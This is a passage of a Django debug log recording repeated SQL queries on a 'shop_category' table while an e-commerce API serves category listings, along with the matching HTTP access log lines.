"shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:05:43,817 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:05:43,820 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:05:43,824 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:05:43,828 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:05:43,834 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:05:43,839 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:05:43,843 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:05:43,847 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:05:43,851 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:05:43,857 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:05:43,861 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:05:43,865 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:05:43,869 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:05:43,873 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:05:43,879 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:05:43,883 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:05:43,887 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:05:43,892 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:05:43,896 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:05:43,900 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:05:43,906 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:05:43,910 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:05:43,914 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:05:43,918 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:05:43,923 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:05:43,929 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:05:43,933 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:05:43,937 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:05:43,941 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:05:43,945 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:05:43,952 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:05:43,956 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:05:43,961 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:05:43,965 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:05:43,969 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:05:43,973 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:05:43,978 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:05:43,982 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:05:43,986 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:05:43,991 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:05:43,995 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:05:43] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:05:47,799 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 3; args=(3,) DEBUG 2019-12-16 07:05:47,803 utils 20136 140506422044416 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:05:47,809 utils 20136 140506432534272 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:05:47,814 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:05:47,818 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:05:47,821 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:05:47,826 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) [16/Dec/2019 07:05:47] "GET /api/v1/categories/3 HTTP/1.0" 200 942 DEBUG 2019-12-16 07:05:47,828 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:05:47,831 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:05:47,833 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:05:47,836 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:05:47,839 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:05:47,841 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:05:47,844 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:05:47,847 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:05:47,850 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:05:47,854 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:05:47,856 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:05:47,859 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:05:47,861 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:05:47,864 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:05:47,868 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:05:47,872 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:05:47,874 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:05:47,877 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:05:47,880 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:05:47,883 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", 